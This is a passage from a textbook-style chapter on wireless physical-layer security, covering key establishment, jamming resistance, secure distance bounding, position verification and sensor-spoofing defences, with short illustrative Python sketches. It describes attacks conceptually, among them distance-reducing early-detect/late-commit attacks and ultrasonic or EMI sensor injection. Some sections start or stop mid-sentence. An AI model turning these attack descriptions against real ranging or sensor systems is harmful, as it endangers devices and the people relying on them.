Following this, the chapter continues to present approaches for performing secure distance
measurements and secure positioning based on electromagnetic waves. Protocols for dis-
tance measurements and positioning are designed in order to thwart threats on the physical
layer as well as the logical layer. Those attack vectors are covered in detail, together with
defence strategies and the requirements for secure position verification.
Then, the Knowledge Area covers unintentional wireless emanations from devices such as
from computer displays and summarises wireless side-channel attacks studied in literature.
This is followed by a review on the spoofing of analogue sensors. Unintentional emissions
are by nature different from wireless communication systems, especially because these
interactions are not structured; they are not designed to carry information. However, they too
make use of, or can be affected by, electromagnetic waves.
Finally, after having treated the fundamental concepts of wireless physical security, this
Knowledge Area presents a selection of existing communication technologies and discusses
their security mechanisms. It explains design choices and highlights potential shortcomings
while referring to the principles described in the earlier sections. Included are examples from
near-field communication and wireless communication in the aviation industry, followed by
the security considerations of cellular networks. Security of global navigation systems and of
terrestrial positioning systems is covered last, since the security goals of such systems differ
from those of communication systems and are mainly related to position spoofing resilience.
CONTENT
dynamic thresholds.
Information reconciliation phase: Since the quantisation phase is likely to result in disagreeing
sequences at Alice and Bob, they need to reconcile their sequences to correct for any errors.
This is typically done leveraging error correcting codes and privacy amplification techniques.
Most schemes use simple level-crossing algorithms for quantisation and do not use coding
techniques. However, if the key derivation uses methods based on channel states whose
distributions are not necessarily symmetric, more sophisticated quantisation methods, such
as approximating the channel fading phenomena as a Gaussian source, or (multi-level) coding,
are needed [2165].
Key Verification Phase: In this last phase, communicating parties confirm that they established
a shared secret key. If this step fails, the parties need to restart key establishment.
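As a concrete illustration of the quantisation phase, here is a minimal level-crossing quantiser in the spirit of the simple schemes mentioned above: samples well above or below the mean become bits, and samples inside a guard band are dropped, because Alice and Bob are most likely to disagree on them. The guard-band parameter and the public exchange of kept indices are assumptions modelled on published schemes, not a specific protocol.

```python
# Minimal sketch of level-crossing quantisation of channel samples
# (e.g., RSSI values) into key bits. alpha (guard-band width) is assumed.
import statistics

def quantise(samples, alpha=0.5):
    mean = statistics.mean(samples)
    std = statistics.stdev(samples)
    upper, lower = mean + alpha * std, mean - alpha * std
    bits, kept = [], []
    for i, s in enumerate(samples):
        if s > upper:
            bits.append(1); kept.append(i)
        elif s < lower:
            bits.append(0); kept.append(i)
        # samples inside the guard band are discarded as unreliable
    # The kept indices can be exchanged publicly so both sides retain
    # the same sample positions without revealing the bit values.
    return bits, kept

rssi = [-70.1, -62.3, -75.8, -61.0, -69.9, -77.2, -60.4]   # illustrative samples
bits, kept = quantise(rssi)
print(bits, kept)
```

Because Alice's and Bob's measurements of the reciprocal channel are noisy, the resulting bit strings will still disagree in places, which is exactly what the information reconciliation phase above corrects.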
Most of the research in physical-layer techniques has been concerned with the choice of
channel properties and of the quantisation technique. Even if physical-layer key establishment
techniques seem attractive, many of them have been shown to be vulnerable to active, physi-
cally distributed and multi-antenna adversaries. However, in a number of scenarios where the
devices are mobile, and where the attacker is restricted, they can be a valuable replacement
or enhancement to traditional public-key key establishment techniques.
Initially, physical-layer key establishment techniques were proposed in the context of single-
antenna devices. However, with the emergence of MIMO devices and beam-forming, re-
searchers have proposed to leverage these new capabilities to further secure communication.
Two basic techniques that were proposed in this context are orthogonal blinding and zero
forcing. Both of these techniques aim to enable the transmitter to wirelessly send confidential
data to the intended receiver, while preventing the co-located attacker from receiving this
data. This might seem infeasible, since the attacker, as well as the intended receiver, can
receive all transmitted packets. However, MIMO systems allow transmitters to ’steer’
the signal towards the intended receiver. For beam-forming to be effective, the transmitter
needs to know some channel information for the channels from its antennas to the anten-
nas of the receiver. As described in [2167], these channels are considered to be secret from
the attacker. In Zero-Forcing, the transmitter knows the channels to the intended receiver
as well as to the attacker. This allows the transmitter to encode the data such that it can
be measured at the receiver, whereas the attacker measures nothing related to the data. In
many scenarios, assuming the knowledge of the channel to the attackers is unrealistic. In
Orthogonal Blinding, the transmitter does not know the channel to the attacker, but knows the
channels to the receiver. The transmitter then encodes the data in such a way that the receiver
can decode the data, whereas the attacker will receive data mixed with random noise. The
attacker therefore cannot decode the data. In order to communicate securely, the transmitter
and the receiver do not need to share any secrets. Instead, the transmitter only needs to know
(or measure) the channels to the intended receivers. Like physical-layer key establishment
techniques, these techniques have been shown to be vulnerable to multi-antenna and physically
distributed attackers. They were further shown to be vulnerable to known-plaintext attacks.
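A minimal numerical sketch of the zero-forcing idea (with made-up channel values): the transmitter picks a precoding vector orthogonal to the attacker's channel, so the attacker's observation of the symbol is ideally zero while the intended receiver still obtains a usable copy.

```python
# Zero-forcing sketch for a 2-antenna transmitter. Channel vectors are
# invented for illustration; in zero-forcing both are assumed known.
import numpy as np

h_r = np.array([0.9 + 0.2j, 0.4 - 0.7j])   # channel to intended receiver
h_e = np.array([0.1 - 0.5j, 0.8 + 0.3j])   # channel to attacker

u = h_e.conj()                  # transmit direction that couples to the attacker
v = h_r.conj()                  # matched filter towards the intended receiver
w = v - (np.vdot(u, v) / np.vdot(u, u)) * u   # project out the attacker-facing part
w /= np.linalg.norm(w)          # normalise transmit power

x = 1 + 0j                                        # data symbol
print("receiver observes:", abs(h_r @ (w * x)))   # clearly non-zero
print("attacker observes:", abs(h_e @ (w * x)))   # ~0, up to floating-point error
```

Orthogonal blinding replaces the unknown attacker channel with random noise transmitted in all directions orthogonal to the receiver's channel, which is why it only degrades, rather than nulls, the attacker's reception.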
Friendly jamming was originally proposed for the protection of those medical implants (e.g.,
already implanted pacemakers) that have no abilities to perform cryptographic operations.
The main idea was that the collaborating device (i.e. ’the shield’) would be placed around the
user’s neck, close to the pacemaker. This device would then simultaneously receive and jam
all communication from the implant. The shield would then be able to forward the received
messages to any other authorised device using standard cryptographic techniques.
receiver and transmitter. This allows the legitimate receiver to recombine the signal while an
eavesdropper is unable to do so.
Covert communication is parasitic and leverages legitimate and expected transmissions
to enable unobservable communication. Typically, such communication hides within the
expected and tolerated deviations of the signal from its nominal form. One prominent example
is the embedding of communicated bits within modulation errors.
be non-zero. In fact, if the receiver is broadband, it can recover all the messages transmitted by
the sender. UFH, however, introduces new challenges. Given that the sender and the receiver
are not synchronised, and short message fragments transmitted within each hop are not
authenticated, the attacker can inject fragments that make the reassembly of the packets
infeasible. To prevent this, UFH includes fragment linking schemes that make this reassembly
possible even under poisoning.
UDSSS follows the principle of DSSS in terms of spreading the data using spreading sequences.
However, in contrast to anti-jamming DSSS where the spreading sequence is secret and shared
exclusively by the communication partners, in UDSSS, a public set of spreading sequences is
used by the sender and the receivers. To transmit a message, the sender repeatedly selects a
fresh, randomly selected spreading sequence from the public set and spreads the message
with this sequence. Hence, UDSSS neither requires message fragmentation at the sender
nor message reassembly at the receivers. The receivers record the signal on the channel
and despread the message by applying sequences from the public set, using a trial-and-error
approach. The receivers are not synchronised to the beginning of the sender’s message and
thus record for (at least) twice the message transmission time. After the sampling, the receiver
tries to decode the data in the buffer by using code sequences from the set and by applying a
sliding-window protocol.
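The following toy model illustrates UDSSS trial-and-error despreading; the sequence length, set size, and noiseless, pre-aligned channel are simplifying assumptions made to keep the sketch short.

```python
# Toy UDSSS model: the sender spreads each message with a randomly chosen
# sequence from a PUBLIC set; receivers try every sequence and keep the
# one with the strongest correlation. Parameters are illustrative.
import numpy as np

rng = np.random.default_rng(0)
PUBLIC_SET = [rng.choice([-1, 1], size=32) for _ in range(8)]  # public sequences

def spread(bits, seq):
    # BPSK-style spreading: each data bit (+1/-1) multiplies the chip sequence.
    symbols = np.array([1 if b else -1 for b in bits])
    return np.concatenate([s * seq for s in symbols])

def despread(signal, seq):
    chips = signal.reshape(-1, len(seq))
    corr = chips @ seq / len(seq)     # exactly +1 or -1 per symbol if seq matches
    return [int(c > 0) for c in corr], float(np.mean(np.abs(corr)))

message = [1, 0, 1, 1, 0]
tx = spread(message, PUBLIC_SET[rng.integers(len(PUBLIC_SET))])  # fresh random pick

# Trial-and-error despreading over the public set.
decoded, _ = max((despread(tx, s) for s in PUBLIC_SET), key=lambda r: r[1])
print(decoded == message)   # True
```

Since the attacker cannot know which sequence the sender will pick for the next message, it cannot jam the transmission selectively; it can only spread its jamming power across the whole public set.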
from signals, for example, by means of some spectral transformations such as Fast Fourier
Transform (FFT) or Discrete Wavelet Transform (DWT), without a-priori knowledge of a spe-
cific signal characteristic. For instance, wavelet transformations have been applied on signal
turn-on transients and different data-related signal regions. The Fourier transformation has
also been used to extract features from the turn-on transient and other technology-specific
device responses. Both predefined and inferred features can be subject to further statistical
analysis in order to improve their quality and distinguishing power.
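A hedged sketch of inferred-feature extraction of this kind: compute FFT magnitudes over a windowed turn-on transient, reduce them to coarse sub-band energies, and compare the resulting vector against stored device templates. The segment length, band count, and distance metric are assumptions chosen for illustration.

```python
# Sketch of spectral fingerprint features from a turn-on transient.
import numpy as np

def spectral_features(transient, n_bands=16):
    spectrum = np.abs(np.fft.rfft(transient * np.hanning(len(transient))))
    bands = np.array_split(spectrum, n_bands)    # coarse sub-band energies
    feats = np.array([band.mean() for band in bands])
    return feats / np.linalg.norm(feats)         # normalise out power differences

def distance(f1, f2):
    return float(np.linalg.norm(f1 - f2))        # smaller = more similar device

# Usage sketch with synthetic data standing in for recorded transients.
rng = np.random.default_rng(1)
template = spectral_features(rng.standard_normal(1024))
capture = spectral_features(rng.standard_normal(1024))
print(distance(template, capture))
```

In a real fingerprinting system such feature vectors would feed the statistical analysis mentioned above (e.g., a classifier trained per device) rather than a single distance threshold.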
complexity and low power consumption, phase based ranging is used in several commercial
products.
Finally, the time taken for the radio waves to travel from one point to another can be used
to measure the distance between the devices. In RF-based RTT distance estimation,
the distance d between two entities is given by d = (t_rx − t_tx) × c, where c is the speed
of light, and t_tx and t_rx represent the times of transmission and reception, respectively. The
measured time-of-flight can either be a one-way time-of-flight or a round-trip time-of-flight.
One-way time-of-flight measurement requires the clocks of the measuring entities to be tightly
synchronised. The errors due to mismatched clocks are compensated for in the round-trip
time-of-flight measurement.
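The arithmetic can be made concrete with a short worked example; the timings below are illustrative.

```python
# Worked example of ToF distance estimation (illustrative values).
C = 299_792_458.0            # speed of light, m/s

def one_way_distance(t_tx, t_rx):
    # Requires tightly synchronised clocks at both entities.
    return (t_rx - t_tx) * C

def round_trip_distance(t_round, t_processing):
    # Round-trip ToF tolerates clock mismatch: subtract the prover's (known)
    # processing delay and halve the remaining flight time.
    return (t_round - t_processing) * C / 2

print(one_way_distance(0.0, 100e-9))       # ~30 m for 100 ns of flight
print(round_trip_distance(1e-6, 800e-9))   # ~30 m as well
print(one_way_distance(0.0, 1e-9))         # ~0.3 m: why 1 ns of error matters
```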
The precise distance measurement largely depends on the system’s ability to estimate the
time of arrival and the physical characteristics of the radio frequency signal itself. The ranging
precision is roughly proportional to the bandwidth of the ranging signal. Depending on the
required level of accuracy, time-of-flight based distance measurement systems use either
Impulse-Radio Ultra Wideband (IR-UWB) or Chirp-Spread Spectrum (CSS) signals. IR-UWB
systems provide centimeter-level precision while the precision of CSS systems is of the order
of 1–2m. There are a number of commercially available wireless systems that use chirp and
UWB round-trip time-of-flight for distance measurement today.
In Time of Flight (ToF) based ranging systems, the distance is estimated based on the time
elapsed between the verifier transmitting a ranging packet and receiving an acknowledgement
back from the prover. In order to reduce the distance measured, an attacker must decrease
the signal’s round trip time of flight. Based on the implementation, an attacker can reduce the
estimated distance in a time-of-flight based ranging system in more than one way. Given that
radio signals travel at the speed of light, a 1 ns decrease in the time estimate results in a
distance reduction of 30 cm.
The first type of attack on time-of-flight ranging leverages the predictable nature of the data
contained in the ranging and the acknowledgement packets. A number of time-of-flight ranging
systems use pre-defined data packets for ranging, making it trivial for an attacker to predict
and generate their own ranging or acknowledgment signal. An attacker can transmit the
acknowledgment packet even before receiving the challenge ranging packet. Several works
have shown that the de-facto standard for IR-UWB, IEEE 802.15.4a does not automatically
provide security against distance decreasing attacks. In [2187] it was shown that an attacker
can potentially decrease the measured distance by as much as 140 meters by predicting the
preamble and payload data with more than 99% accuracy even before receiving the entire
symbol. In a ’Cicada’ attack, the attacker continuously transmits a pulse with a power greater
than that of the prover. This degrades the performance of energy-detection-based receivers,
resulting in a reduction of the measured distance. In order to prevent such attacks, it is
important to avoid predefined or fixed data during the time critical phase of the distance
estimation scheme.
In addition to having the response packet dependent on the challenge signal, the way in
which these challenge and response data are encoded in the radio signals affects the security
guarantees provided by the ranging or localisation system. An attacker can predict the bit
(early detect) even before receiving the symbol completely. Furthermore, the attacker can
leverage the robustness property of modern receivers and transmit arbitrary signal until the
correct symbol is predicted. Once the bit is predicted (e.g., early-detection), the attacker stops
transmitting the arbitrary signal and switches to transmitting the bit corresponding to the
predicted symbol, i.e., the attacker ’commits’ to the predicted symbol, commonly known as
late commit. In such a scenario, the attacker need not wait for the entire series of pulses to be
received before detecting the data being transmitted: after observing only an initial portion of
the symbol, the attacker is able to correctly predict it.
As described previously, round-trip time-of-flight systems are implemented either using chirp or
impulse radio ultrawideband signals. Due to their long symbol lengths, both implementations
have been shown to be vulnerable to early-detect and late-commit attacks. In the case of
chirp-based systems, an attacker can decrease the distance by more than 160 m and in some
scenarios even up to 700 m. Although IR-UWB pulses are of short duration (typically 2–3 ns
long), data symbols are typically composed of a series of UWB pulses. Furthermore, IEEE
802.15.4a IR-UWB standard allows long symbol lengths ranging from 32 ns to as large as 8µs.
Therefore, even the smallest symbol length of 32 ns allows an attacker to reduce the distance
by as much as 10 m by performing early-detect and late-commit attacks. Thus, it is clear that
in order to guarantee proximity and secure a wireless proximity system against early detect
and late-commit attacks, it is necessary to keep the symbol length as short as possible.
Design of a physical layer for secure distance measurement remains an open topic. However,
research so far has yielded some guiding principles for its design. Only radio RTT with single-
pulse or multi-pulse UWB modulation has been shown to be secure against physical layer
attacks. As a result, the IEEE 802.15.4z working group started the standardisation of a new
physical layer for secure ranging.
Figure 22.2: If the computed location of the prover is in the verification triangle, the verifiers
conclude that this is a correct location. To spoof the position of prover inside the triangle, the
attacker would need to reduce at least one of the distance bounds.
outside of the triangle/pyramid, causing the prover and the verifiers to reject the computed
position. Namely, the verifiers and the prover only accept the positions that are within the area
of coverage, defined as the area covered by the verification triangles/pyramids. Given this,
when the prover is trusted, Verifiable Multilateration is resilient to all forms of spoofing by the
attacker. Additional care needs to be given to the management of errors and the computation
of the position when distance measurement errors are taken into account.
When used for position verification, Verifiable Multilateration is run with an untrusted prover.
Each verifier runs a distance-fraud resilient distance bounding protocol with the prover. Based
on the obtained distance bounds, the verifiers compute the provers’ position. If this position
(within some distance and position error bounds) falls within the verification triangle/pyramid,
the verifiers accept it as valid. Given that the prover is untrusted, it can enlarge any of the
measured distances, but cannot reduce them since this is prevented by the use of distance
bounding protocols. Like in the case of secure positioning, the geometry of the triangle/pyramid
then prevents the prover from claiming a false position. Unlike in the case of secure positioning,
position verification is vulnerable to cloning attacks, in which the prover shares its key with its
clones. These clones can then be strategically placed relative to the verifiers and fake any
position by enlarging distances to each individual verifier. This attack can possibly be addressed by
tamper resistant hardware or device fingerprinting.
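A minimal sketch of the verification step in Verifiable Multilateration: estimate the prover's position from the three distance bounds via linearised least squares, and accept it only if it lies inside the verification triangle. The coordinates and bounds are illustrative, and real deployments would additionally apply the distance and position error tolerances discussed above.

```python
# Sketch of position estimation plus in-triangle verification.
import numpy as np

def estimate_position(verifiers, dists):
    # Linearise the circle equations by subtracting the first from the others.
    (x1, y1) = verifiers[0]
    A, b = [], []
    for (xi, yi), di in zip(verifiers[1:], dists[1:]):
        A.append([2 * (xi - x1), 2 * (yi - y1)])
        b.append(dists[0] ** 2 - di ** 2 + xi ** 2 - x1 ** 2 + yi ** 2 - y1 ** 2)
    pos, *_ = np.linalg.lstsq(np.array(A), np.array(b), rcond=None)
    return pos

def inside_triangle(p, tri):
    # p is inside if it lies on the same side of all three directed edges.
    signs = []
    for i in range(3):
        ax, ay = tri[i]
        bx, by = tri[(i + 1) % 3]
        cross = (bx - ax) * (p[1] - ay) - (by - ay) * (p[0] - ax)
        signs.append(cross > 0)
    return all(signs) or not any(signs)

verifiers = [(0.0, 0.0), (100.0, 0.0), (50.0, 90.0)]   # verification triangle (m)
bounds = [58.31, 58.31, 60.0]                          # distance bounds to the prover

pos = estimate_position(verifiers, bounds)
print(pos)                                 # ~ (50, 30)
print(inside_triangle(pos, verifiers))     # True -> position accepted
```

Because an untrusted prover can only enlarge the distance bounds, any manipulation pushes the computed position outside the triangle, where it is rejected by this check.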
Another approach to secure positioning and position verification is to prevent the attacker
from deterministically spoofing the computed position by making the positions of the verifiers
unpredictable for the attacker (either a malicious prover or an external attacker). Verifier
positions can therefore be hidden or the verifiers can be mobile. When the verifiers are hidden
they should only listen to the beacons sent by the nodes to not disclose their positions. Upon
receiving the beacons, the base stations compute the nodes’ locations with TDOA and check if
these locations are consistent with the time differences.
predict. As a result, unintentional and especially intentional EMI targeted at analogue sensors
can pose a realistic threat to any system that relies on readings obtained from an affected
sensor.
EMI has been used to manipulate the output of medical devices as well as to compromise
ultrasonic ranging systems. Research has shown that consumer electronic devices equipped
with microphones are especially vulnerable to the injection of fabricated audio signals [1999].
Ultrasonic signals were used to inject silent voice commands, and acoustic waves were used
to affect the output of MEMS accelerometers. Accelerometers and inertial systems based
on MEMS are, for instance, used extensively in (consumer-grade) drones and multi-copters.
Undoubtedly, sensor spoofing attacks have gained a lot of attention and will likely impact
many future cyber-physical devices. System designers therefore have to take great care
and protect analogue sensors from adversarial input as an attacker might trigger a critical
decision on the application layer of such a device by exposing it to intentional EMI. Potential
defence strategies include, for example, (analogue) shielding of the devices, measuring signal
contamination using various metrics, or accommodating dedicated EMI monitors to detect
and flag suspicious sensor readings.
A promising strategy that follows the approach of quantifying signal contamination to detect
EMI sensor spoofing is presented in [2193]. The sensor output can be turned on and off
according to a pattern unknown to the attacker. Adversarial EMI in the wires between sensor
and the circuitry converting the reading to a digital value, i.e., the ADC, can be detected
during the times the sensor is off since the sensor output should be at a known level. In case
there are fluctuations in the readings, an attack is detected. Such an approach is thought
to be especially effective when used to protect powered or non-powered passive sensors.
It has been demonstrated to successfully thwart EMI attacks against a microphone and a
temperature sensor system. The only modification required is the addition of an electronic
switch that can be operated by the control unit or microcontroller to turn the sensor on and off.
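A hedged sketch of this on/off detection idea: sample the ADC while the sensor is switched off according to a pattern the attacker cannot predict, and flag an attack if a signal is present during the off-slots. The threshold and the hardware-access callbacks (read_adc, set_sensor_power) are hypothetical placeholders for platform-specific code.

```python
# Sketch of the off-period EMI check described in [2193]-style schemes.
import random

QUIET_LEVEL = 0.0     # expected ADC reading with the sensor disconnected
THRESHOLD = 0.05      # tolerated noise floor (assumption)

def sample_with_emi_check(read_adc, set_sensor_power, n_slots=16):
    """Collect sensor readings; abort if EMI is seen while the sensor is off."""
    readings = []
    for _ in range(n_slots):
        powered = random.random() < 0.5        # secret, unpredictable pattern
        set_sensor_power(powered)
        value = read_adc()
        if not powered and abs(value - QUIET_LEVEL) > THRESHOLD:
            # Signal present with the sensor disconnected -> injected EMI.
            raise RuntimeError("EMI injection suspected during off-slot")
        if powered:
            readings.append(value)
    set_sensor_power(True)
    return readings
```

The same randomised on/off principle underpins the challenge-response scheme for active sensors described next, where the emitter, rather than the whole sensor, is silenced unpredictably.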
A similar sensor spoofing detection scheme can be implemented for active sensors, such as
ultrasonic and infrared sensors, by incorporating a challenge-response-like mechanism into
the measurement acquisition process [2195]. An active sensor often has an emitting element
and a receiving element. The emitter releases a signal that is reflected and captured by the
receiver. Based on the properties of the received signal, the sensor can infer information about
the entity or the object that reflected the signal. The emitter can be turned off randomly and
during that time the receiver should not be able to register any incoming signal. Otherwise, an
attack is detected and the sensor reading is discarded.